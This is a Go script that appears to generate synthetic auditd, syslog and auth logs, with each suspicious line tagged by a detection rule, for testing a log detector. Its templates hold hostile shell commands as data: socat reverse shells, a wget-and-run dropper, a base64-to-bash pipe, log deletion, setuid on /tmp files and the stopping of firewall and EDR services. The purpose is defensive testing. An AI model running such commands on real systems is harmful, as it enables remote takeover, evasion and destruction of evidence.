// genlog generates synthetic auditd, syslog, and auth log files for testing.
//
// Usage:
//
//	go run ./scripts/genlog [flags]
//
// Flags:
//
//	-seed   int    random seed (default: random, printed so you can replay)
//	-count  int    approximate number of events per log file (default: 200)
//	-ratio  float  fraction of events that are suspicious (default: 0.2)
//	-out    string output directory (default: testdata)
package main

import (
	"flag"
	"fmt"
	"math/rand"
	"os"
	"path/filepath"
	"time"
)

// ─── CLI ─────────────────────────────────────────────────────────────────────

func main() {
	seedFlag := flag.Int64("seed", 0, "random seed (0 = use current time)")
	count := flag.Int("count", 200, "approximate events per log file")
	ratio := flag.Float64("ratio", 0.2, "fraction of events that should be suspicious (0.0–1.0)")
	outDir := flag.String("out", "testdata", "output directory")
	flag.Parse()

	seed := *seedFlag
	if seed == 0 {
		seed = time.Now().UnixNano()
	}
	fmt.Printf("seed: %d  (replay with -seed %d)\n", seed, seed)

	if err := os.MkdirAll(*outDir, 0755); err != nil {
		fmt.Fprintf(os.Stderr, "error creating output dir: %v\n", err)
		os.Exit(1)
	}

	rng := rand.New(rand.NewSource(seed))
	baseTime := time.Date(2023, 11, 14, 8, 0, 0, 0, time.UTC)

	files := []struct {
		name string
		fn   func(*rand.Rand, time.Time, int, float64) ([]entry, time.Time)
	}{
		{"generated_auditd.log", generateAuditd},
		{"generated_syslog.log", generateSyslog},
		{"generated_auth.log", generateAuth},
	}

	for _, f := range files {
		entries, _ := f.fn(rng, baseTime, *count, *ratio)
		path := filepath.Join(*outDir, f.name)
		if err := writeLog(path, entries); err != nil {
			fmt.Fprintf(os.Stderr, "error writing %s: %v\n", path, err)
			os.Exit(1)
		}
		printSummary(path, entries)
	}
}

// ─── Entry ───────────────────────────────────────────────────────────────────

type entry struct {
	line      string
	rule      string // empty = benign
}

func (e entry) suspicious() bool { return e.rule != "" }

func writeLog(path string, entries []entry) error {
	f, err := os.Create(path)
	if err != nil {
		return err
	}
	defer f.Close()

	fmt.Fprintf(f, "# Generated by genlog — %s\n", time.Now().UTC().Format(time.RFC3339))
	fmt.Fprintf(f, "# Benign entries produce no rule matches.\n")
	fmt.Fprintf(f, "# Entries with a rule comment should trigger that rule.\n\n")

	for _, e := range entries {
		if e.suspicious() {
			fmt.Fprintf(f, "# [DETECT] %s\n", e.rule)
		}
		fmt.Fprintln(f, e.line)
	}
	return nil
}

func printSummary(path string, entries []entry) {
	susp := 0
	rules := map[string]int{}
	for _, e := range entries {
		if e.suspicious() {
			susp++
			rules[e.rule]++
		}
	}
	fmt.Printf("\n%s\n", path)
	fmt.Printf("  total: %d  suspicious: %d  benign: %d\n", len(entries), susp, len(entries)-susp)
	for rule, n := range rules {
		fmt.Printf("  %-55s x%d\n", rule, n)
	}
}

// ─── Helpers ─────────────────────────────────────────────────────────────────

func pick[T any](rng *rand.Rand, items []T) T {
	return items[rng.Intn(len(items))]
}

func randPID(rng *rand.Rand) int { return rng.Intn(64535) + 1000 }
func randUID(rng *rand.Rand) int { return pick(rng, []int{0, 0, 1000, 1001, 1002}) }

func advanceTime(rng *rand.Rand, cur time.Time) time.Time {
	// Random gap between 1 second and 3 minutes
	secs := time.Duration(rng.Intn(180)+1) * time.Second
	return cur.Add(secs)
}

var (
	hostnames = []string{"webserver", "db-01", "dev-box", "bastion", "worker-3", "fileserver"}
	usernames = []string{"alice", "bob", "deploy", "admin", "charlie", "svc-backup"}
	srcIPs    = []string{"10.0.0.5", "10.0.0.11", "192.168.1.50", "172.16.4.22", "10.10.0.99"}
)

// ─── Auditd ──────────────────────────────────────────────────────────────────

// generateAuditd produces `count` logical events. Each event is a correlated
// group of records (SYSCALL + EXECVE + CWD + optional PATH) all sharing the
// same seq number, mirroring what real auditd writes. This lets the parser's
// event-correlation logic merge the records into one complete event so output
// rows have fully populated columns.
func generateAuditd(rng *rand.Rand, start time.Time, count int, ratio float64) ([]entry, time.Time) {
	cur := start
	seq := 1000 + rng.Intn(500)
	var entries []entry

	for i := 0; i < count; i++ {
		cur = advanceTime(rng, cur)
		seq += rng.Intn(3) + 1
		ts := cur.Unix()

		var group []entry
		if rng.Float64() < ratio {
			group = auditdSuspicious(rng, ts, seq)
		} else {
			group = auditdBenign(rng, ts, seq)
		}
		entries = append(entries, group...)
	}
	return entries, cur
}

func auditField(ts int64, seq int, typ, fields string) string {
	return fmt.Sprintf("type=%s msg=audit(%d.%03d:%d): %s",
		typ, ts, 0, seq, fields)
}

// auditdBenign emits a correlated group of records for one normal file-access
// or authentication event.
func auditdBenign(rng *rand.Rand, ts int64, seq int) []entry {
	pid := randPID(rng)
	ppid := randPID(rng)
	uid := rng.Intn(2) * 1000 // 0 or 1000

	// Auth events are inherently single-record.
	if rng.Intn(4) == 0 {
		line := auditField(ts, seq, "USER_AUTH", fmt.Sprintf(
			"pid=%d uid=0 auid=4294967295 ses=4294967295 msg='op=PAM:authentication acct=%q exe=\"/usr/sbin/sshd\" hostname=%s addr=%s terminal=ssh res=success'",
			pid, pick(rng, usernames), pick(rng, srcIPs), pick(rng, srcIPs),
		))
		return []entry{{line: line}}
	}

	comm := pick(rng, []string{"cat", "ls", "grep", "stat", "head", "find"})
	exe := pick(rng, []string{"/bin/cat", "/bin/ls", "/bin/grep", "/usr/bin/stat", "/usr/bin/find"})
	target := pick(rng, []string{"/etc/hosts", "/etc/resolv.conf", "/var/log/syslog", "/etc/crontab", "/proc/uptime"})
	cwd := pick(rng, []string{"/home/alice", "/root", "/var/log", "/tmp", "/opt/app"})

	syscall := auditField(ts, seq, "SYSCALL", fmt.Sprintf(
		"arch=c000003e syscall=2 success=yes exit=3 ppid=%d pid=%d auid=%d uid=%d gid=%d euid=%d suid=%d fsuid=%d egid=%d sgid=%d fsgid=%d tty=pts0 ses=1 comm=%q exe=%q key=(null)",
		ppid, pid, uid, uid, uid, uid, uid, uid, uid, uid, uid, comm, exe,
	))
	execve := auditField(ts, seq, "EXECVE", fmt.Sprintf(
		"argc=2 a0=%q a1=%q", comm, target,
	))
	cwdRec := auditField(ts, seq, "CWD", fmt.Sprintf("cwd=%q", cwd))
	path := auditField(ts, seq, "PATH", fmt.Sprintf(
		"item=0 name=%s inode=%d dev=fd:00 mode=0100644 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL",
		target, rng.Intn(999999)+1000,
	))

	return []entry{
		{line: syscall},
		{line: execve},
		{line: cwdRec},
		{line: path},
	}
}

// auditdSuspicious emits a correlated group of records for one suspicious event.
// The first record (SYSCALL) carries the rule tag; subsequent records are
// supplementary and share the same seq so they merge into the same event.
func auditdSuspicious(rng *rand.Rand, ts int64, seq int) []entry {
	pid := randPID(rng)
	ppid := randPID(rng)
	auid := 1000 + rng.Intn(3)

	type suspTmpl struct {
		comm, exe, execveArgs, pathName, rule string
	}

	templates := []suspTmpl{
		// lnx_auditd_susp_c2_commands — reverse shell tools
		{
			comm: pick(rng, []string{"nc", "ncat", "socat", "nmap", "base64"}),
			exe:  pick(rng, []string{"/bin/nc", "/usr/bin/ncat", "/usr/bin/socat", "/usr/bin/nmap", "/usr/bin/base64"}),
			execveArgs: fmt.Sprintf("argc=3 a0=%q a1=%q a2=%q",
				pick(rng, []string{"nc", "ncat", "socat"}),
				pick(rng, srcIPs),
				fmt.Sprintf("%d", 4000+rng.Intn(1000)),
			),
			pathName: "",
			rule:     "lnx_auditd_susp_c2_commands",
		},
		// lnx_auditd_system_info_discovery
		{
			comm:       pick(rng, []string{"uname", "hostname", "lsmod", "env"}),
			exe:        pick(rng, []string{"/usr/bin/uname", "/usr/bin/hostname", "/sbin/lsmod", "/usr/bin/env"}),
			execveArgs: fmt.Sprintf("argc=2 a0=%q a1=%q", pick(rng, []string{"uname", "hostname"}), pick(rng, []string{"-a", "-r", "--all"})),
			pathName:   pick(rng, []string{"/etc/lsb-release", "/etc/redhat-release", "/etc/issue", "/proc/cpuinfo"}),
			rule:       "lnx_auditd_system_info_discovery",
		},
		// lnx_auditd_password_policy_discovery
		{
			comm:       pick(rng, []string{"chage", "passwd"}),
			exe:        pick(rng, []string{"/usr/bin/chage", "/usr/bin/passwd"}),
			execveArgs: fmt.Sprintf("argc=3 a0=chage a1=%q a2=%q", pick(rng, []string{"--list", "-l"}), pick(rng, usernames)),
			pathName:   pick(rng, []string{"/etc/login.defs", "/etc/pam.d/common-auth", "/etc/shadow", "/etc/security/pwquality.conf"}),
			rule:       "lnx_auditd_password_policy_discovery",
		},
		// lnx_auditd_schedule_task_job_cron
		{
			comm:       "crontab",
			exe:        "/usr/bin/crontab",
			execveArgs: fmt.Sprintf("argc=2 a0=crontab a1=%q", pick(rng, []string{"-e", "-l", "-r"})),
			pathName:   fmt.Sprintf("/var/spool/cron/crontabs/%s", pick(rng, usernames)),
			rule:       "lnx_auditd_schedule_task_job_cron",
		},
	}

	t := templates[rng.Intn(len(templates))]

	syscall := auditField(ts, seq, "SYSCALL", fmt.Sprintf(
		"arch=c000003e syscall=59 success=yes exit=0 ppid=%d pid=%d auid=%d uid=%d gid=%d euid=%d suid=%d fsuid=%d egid=%d sgid=%d fsgid=%d tty=pts1 ses=3 comm=%q exe=%q key=susp_activity",
		ppid, pid, auid, auid, auid, auid, auid, auid, auid, auid, auid, t.comm, t.exe,
	))
	execve := auditField(ts, seq, "EXECVE", t.execveArgs)
	cwd := auditField(ts, seq, "CWD", fmt.Sprintf("cwd=%q", pick(rng, []string{"/tmp", "/root", "/home/user", "/var/tmp"})))

	group := []entry{
		{line: syscall, rule: t.rule}, // only first record carries the tag
		{line: execve},
		{line: cwd},
	}
	if t.pathName != "" {
		path := auditField(ts, seq, "PATH", fmt.Sprintf(
			"item=0 name=%s inode=%d dev=fd:00 mode=0100644 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL",
			t.pathName, rng.Intn(999999)+1000,
		))
		group = append(group, entry{line: path})
	}
	return group
}

// ─── Syslog ──────────────────────────────────────────────────────────────────

func generateSyslog(rng *rand.Rand, start time.Time, count int, ratio float64) ([]entry, time.Time) {
	cur := start
	var entries []entry

	for i := 0; i < count; i++ {
		cur = advanceTime(rng, cur)
		var e entry
		if rng.Float64() < ratio {
			e = syslogSuspicious(rng, cur)
		} else {
			e = syslogBenign(rng, cur)
		}
		entries = append(entries, e)
	}
	return entries, cur
}

func syslogTS(t time.Time) string {
	return t.Format("Jan _2 15:04:05")
}

func syslogLine(t time.Time, host, proc, msg string) string {
	return fmt.Sprintf("%s %s %s: %s", syslogTS(t), host, proc, msg)
}

func syslogBenign(rng *rand.Rand, t time.Time) entry {
	host := pick(rng, hostnames)
	pid := randPID(rng)
	user := pick(rng, usernames)
	ip := pick(rng, srcIPs)

	type tmpl struct{ proc, msg string }
	templates := []tmpl{
		{fmt.Sprintf("sshd[%d]", pid), fmt.Sprintf("Accepted %s for %s from %s port %d ssh2",
			pick(rng, []string{"password", "publickey"}), user, ip, 20000+rng.Intn(45535))},
		{fmt.Sprintf("sshd[%d]", pid), fmt.Sprintf("Disconnected from %s port %d", ip, 20000+rng.Intn(45535))},
		{fmt.Sprintf("sudo[%d]", pid), fmt.Sprintf("%s : TTY=pts/%d ; PWD=/home/%s ; USER=root ; COMMAND=%s",
			user, rng.Intn(5), user,
			pick(rng, []string{"/usr/bin/apt-get update", "/bin/systemctl restart nginx", "/usr/sbin/logrotate", "/usr/bin/journalctl -xe"}))},
		{fmt.Sprintf("cron[%d]", pid), fmt.Sprintf("(root) CMD (%s)",
			pick(rng, []string{"/usr/lib/update-notifier/apt-check", "/etc/cron.daily/logrotate", "/usr/sbin/ntpdate pool.ntp.org", "test -x /usr/sbin/anacron"}))},
		{fmt.Sprintf("systemd[%d]", pid), fmt.Sprintf("Started %s.",
			pick(rng, []string{"OpenBSD Secure Shell server", "Daily apt upgrade and clean activities", "Rotate log files", "Network Manager"}))},
		{fmt.Sprintf("kernel"), fmt.Sprintf("EXT4-fs (%s): %s",
			pick(rng, []string{"sda1", "sdb1", "nvme0n1p1"}),
			pick(rng, []string{"mounted filesystem with ordered data mode.", "recovery complete.", "1 orphan inode deleted."}))},
		{fmt.Sprintf("sshd[%d]", pid), fmt.Sprintf("pam_unix(sshd:session): session %s for user %s by (uid=0)",
			pick(rng, []string{"opened", "closed"}), user)},
		{fmt.Sprintf("NetworkManager[%d]", pid), fmt.Sprintf("<info>  [%s] device (%s): state change: activated -> deactivated",
			t.Format("1504.05"), pick(rng, []string{"eth0", "eth1", "ens3", "ens33"}))},
	}

	chosen := templates[rng.Intn(len(templates))]
	return entry{line: syslogLine(t, host, chosen.proc, chosen.msg)}
}

func syslogSuspicious(rng *rand.Rand, t time.Time) entry {
	host := pick(rng, hostnames)
	pid := randPID(rng)
	port := 1024 + rng.Intn(64511)
	ip := pick(rng, srcIPs)

	type suspTmpl struct{ proc, msg, rule string }
	templates := []suspTmpl{
		// lnx_syslog_security_tools_disabling_syslog
		{fmt.Sprintf("systemd[%d]", pid),
			pick(rng, []string{
				"stopping iptables firewall service",
				"stopping ip6tables ipv6 firewall",
				"stopping firewalld dynamic firewall daemon",
				"stopping cbdaemon Carbon Black defense",
				"stopping falcon-sensor CrowdStrike Falcon",
			}),
			"lnx_syslog_security_tools_disabling_syslog"},

		// lnx_clear_syslog
		{fmt.Sprintf("bash[%d]", pid),
			pick(rng, []string{
				"rm /var/log/syslog",
				"rm -f /var/log/syslog",
				"rm -rf /var/log/syslog",
				"mv /var/log/syslog /dev/null",
				" > /var/log/syslog",
			}),
			"lnx_clear_syslog"},

		// lnx_shell_susp_commands — netcat listener
		{fmt.Sprintf("bash[%d]", pid),
			fmt.Sprintf("nc -l -p %d", port),
			"lnx_shell_susp_commands"},

		// lnx_shell_susp_commands — socat reverse shell
		{fmt.Sprintf("bash[%d]", pid),
			fmt.Sprintf("socat exec:/bin/bash,pty,stderr,setsid tcp:%s:%d", ip, port),
			"lnx_shell_susp_commands"},

		// lnx_shell_susp_commands — wget dropper
		{fmt.Sprintf("bash[%d]", pid),
			fmt.Sprintf("wget http://%s/%s; chmod +x %s; ./%s",
				ip,
				pick(rng, []string{"shell.sh", "payload.elf", "backdoor", "install.sh"}),
				pick(rng, []string{"shell.sh", "payload.elf", "backdoor", "install.sh"}),
				pick(rng, []string{"shell.sh", "payload.elf", "backdoor", "install.sh"}),
			),
			"lnx_shell_susp_commands"},

		// lnx_shell_susp_commands — base64 decode pipe
		{fmt.Sprintf("bash[%d]", pid),
			fmt.Sprintf("echo %s | base64 -d | bash",
				pick(rng, []string{"aGVsbG8=", "L2Jpbi9iYXNo", "d2dldCBodHRwOi8v"})),
			"lnx_shell_susp_commands"},

		// lnx_shell_susp_commands — setuid on tmp file
		{fmt.Sprintf("bash[%d]", pid),
			fmt.Sprintf("chmod +s /tmp/%s",
				pick(rng, []string{"rootkit", "backdoor", "x", "exploit", "shell"})),
			"lnx_shell_susp_commands"},

		// lnx_shell_susp_commands — python SimpleHTTPServer
		{fmt.Sprintf("bash[%d]", pid),
			fmt.Sprintf("python -m SimpleHTTPServer %d", port),
			"lnx_shell_susp_commands"},

		// lnx_shell_susp_commands — socat tcp-connect
		{fmt.Sprintf("bash[%d]", pid),
			fmt.Sprintf("socat tcp-connect:%s:%d exec:/bin/sh", ip, port),
			"lnx_shell_susp_commands"},
	}

	tmpl := templates[rng.Intn(len(templates))]
	return entry{
		line: syslogLine(t, host, tmpl.proc, tmpl.msg),
		rule: tmpl.rule,
	}
}

// ─── Auth log ─────────────────────────────────────────────────────────────────

func generateAuth(rng *rand.Rand, start time.Time, count int, ratio float64) ([]entry, time.Time) {
	cur := start
	var entries []entry

	for i := 0; i < count; i++ {
		cur = advanceTime(rng, cur)
		var e entry
		if rng.Float64() < ratio {
			e = authSuspicious(rng, cur)
		} else {
			e = authBenign(rng, cur)
		}
		entries = append(entries, e)
	}
	return entries, cur
}

func authBenign(rng *rand.Rand, t time.Time) entry {
	host := pick(rng, hostnames)
	pid := randPID(rng)
	user := pick(rng, usernames)
	ip := pick(rng, srcIPs)
	port := 20000 + rng.Intn(45535)

	type tmpl struct{ proc, msg string }
	templates := []tmpl{
		{fmt.Sprintf("sshd[%d]", pid),
			fmt.Sprintf("Accepted %s for %s from %s port %d ssh2",
				pick(rng, []string{"password", "publickey"}), user, ip, port)},
		{fmt.Sprintf("sshd[%d]", pid),
			fmt.Sprintf("Failed password for %s from %s port %d ssh2", user, ip, port)},
		{fmt.Sprintf("sshd[%d]", pid),
			fmt.Sprintf("Failed password for invalid user %s from %s port %d ssh2",
				pick(rng, []string{"ftp", "test", "admin", "root", "pi"}), ip, port)},
		{fmt.Sprintf("sshd[%d]", pid),
			fmt.Sprintf("pam_unix(sshd:session): session %s for user %s by (uid=0)",
				pick(rng, []string{"opened", "closed"}), user)},
		{fmt.Sprintf("sshd[%d]", pid),
			fmt.Sprintf("Disconnected from authenticating user %s %s port %d [preauth]", user, ip, port)},
		{fmt.Sprintf("sshd[%d]", pid),
			fmt.Sprintf("Connection closed by %s port %d", ip, port)},
	}

	chosen := templates[rng.Intn(len(templates))]
	return entry{line: syslogLine(t, host, chosen.proc, chosen.msg)}
}

// sshd error messages that match lnx_sshd_susp_ssh.yml
var sshdSuspMessages = []string{
	"unexpected internal error",
	"unknown or unsupported key type",
	"invalid certificate signing key",
	"invalid elliptic curve value",
	"incorrect signature",
	"error in libcrypto",
	"unexpected bytes remain after decoding",
	"fatal: buffer_get_string: bad string",
	"Local: crc32 compensation attack",
	"bad client public DH value",
	"Corrupted MAC on input",
}

func authSuspicious(rng *rand.Rand, t time.Time) entry {
	host := pick(rng, hostnames)
	pid := randPID(rng)
	ip := pick(rng, srcIPs)
	msg := pick(rng, sshdSuspMessages)

	// Some messages naturally include source info, others are bare
	if rng.Float64() > 0.5 {
		msg = fmt.Sprintf("%s from %s port %d", msg, ip, 20000+rng.Intn(45535))
	}

	return entry{
		line: syslogLine(t, host, fmt.Sprintf("sshd[%d]", pid), msg),
		rule: "lnx_sshd_susp_ssh",
	}
}
